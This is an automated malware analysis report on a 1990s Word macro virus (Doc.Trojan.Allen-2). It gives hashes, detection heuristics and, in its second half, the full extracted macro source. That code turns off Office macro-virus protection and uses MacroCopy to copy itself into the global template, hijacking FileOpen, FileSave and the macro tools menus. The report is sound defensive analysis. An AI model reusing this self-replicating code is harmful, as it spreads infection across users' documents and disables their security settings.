Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 3aa98c9d15cc7216…

MALICIOUS

Office (OLE)

39.5 KB Created: 1997-10-01 13:36:00 Authoring application: Microsoft Word 8.0 First seen: 2012-10-10
MD5: d5b0689f2c36a71cf0445dd7adcc380e SHA-1: f07b14e7ce793b63161e4bbec06b082cd85676ec SHA-256: 3aa98c9d15cc72164bbc69ae1cddcbc2aada06f13c787f31ed7bd6838532654f
228 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

This document contains legacy WordBasic macro virus markers and an AutoOpen macro, which are strong indicators of malicious intent. The ClamAV signature 'Doc.Trojan.Allen-2' further supports this assessment. The macro's primary function appears to be copying itself and potentially other macros to the global template, a common technique for persistence and propagation.

Heuristics 5

  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script
    Options.VirusProtection = False
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Attribute VB_Name = "AutoOpen"
  • Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
  • OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY
    OLE file is 40,448 bytes but its declared streams total only 20,586 bytes — 19,862 bytes (49%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2969 bytes
SHA-256: 972dbc554c4741ceebe1018b6912c0fe7cee837eb24959b0c5b65f3069e228bf
Detection
ClamAV: Doc.Trojan.Allen-2
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "AutoExec"

Public Sub MAIN()
Attribute MAIN.VB_Description = "My Love to LIGUINA ALLENA HIVIANTA QUESTASARI"
Attribute MAIN.VB_ProcData.VB_Invoke_Func = "Normal.AutoExec.MAIN"
On Error GoTo tamat
Dim Bln
WordBasic.DisableInput 1
WordBasic.DisableAutoMacros 0
Options.VirusProtection = False
Bln = WordBasic.Month(WordBasic.Now())
Dim Pesan1$, Pesan2$
Pesan1$ = "GepenkUajy96 Lahq"
Pesan2$ = "Cintaku tulus Buat sayangku Allena Hivianta Questasari"
WordBasic.ToolsOptionsUserInfo Name:="GepenkUajy96", Initials:="Allena", Address:="mlampah@hotmail.com" + Chr(13) + "Liguina Allena Hivianta Questasari"
     If Bln = 11 Then
      Assistant.Visible = True
        With Assistant.NewBalloon
            .Icon = msoIconAlert
            .Text = "SELAMAT ULANG TAHUN..ALLEN"
            .Heading = "God bless you"
            .Show
        End With
     End If
tamat:
End Sub

Attribute VB_Name = "AutoOpen"

Public Sub MAIN()
Attribute MAIN.VB_Description = "My Love to LIGUINA ALLENA HIVIANTA QUESTASARI"
Attribute MAIN.VB_ProcData.VB_Invoke_Func = "Normal.AutoOpen.MAIN"
Dim NFile$
Dim NMakro$
Options.VirusProtection = False
NFile$ = WordBasic.[FileName$]()
    On Error GoTo -1: On Error GoTo tamat
    NMakro$ = NFile$ + ":AutoExec"
    WordBasic.MacroCopy NMakro$, "Global:AutoExec"
    On Error GoTo -1: On Error GoTo tamat
    NMakro$ = NFile$ + ":AutoOpen"
    WordBasic.MacroCopy NMakro$, "Global:AutoOpen"
    On Error GoTo -1: On Error GoTo tamat
    NMakro$ = NFile$ + ":FileOpen"
    WordBasic.MacroCopy NMakro$, "Global:FileOpen"
    On Error GoTo -1: On Error GoTo tamat
    NMakro$ = NFile$ + ":FileSave"
    WordBasic.MacroCopy NMakro$, "Global:FileSave"
    On Error GoTo -1: On Error GoTo tamat
    NMakro$ = NFile$ + ":FileSaveAs"
    WordBasic.MacroCopy NMakro$, "Global:FileSaveAs"
    On Error GoTo -1: On Error GoTo tamat
    NMakro$ = NFile$ + ":Tools"
    WordBasic.MacroCopy NMakro$, "Global:FileTemplates"
    On Error GoTo -1: On Error GoTo tamat
    NMakro$ = NFile$ + ":Tools"
    WordBasic.MacroCopy NMakro$, "Global:FileMacro"
    On Error GoTo -1: On Error GoTo tamat
    NMakro$ = NFile$ + ":Tools"
    WordBasic.MacroCopy NMakro$, "Global:ToolsMacro"
    On Error GoTo -1: On Error GoTo tamat
    NMakro$ = NFile$ + ":Tools"
    WordBasic.MacroCopy NMakro$, "Global:ToolsCustomize"
      On Error GoTo tamat
      If Month(Now()) = 11 Then
      Assistant.Visible = True
        With Assistant.NewBalloon
            .Icon = msoIconAlert
            .Text = "SELAMAT ULANG TAHUN..ALLEN"
            .Heading = "My heart to you"
            .Show
        End With
       End If
tamat:
End Sub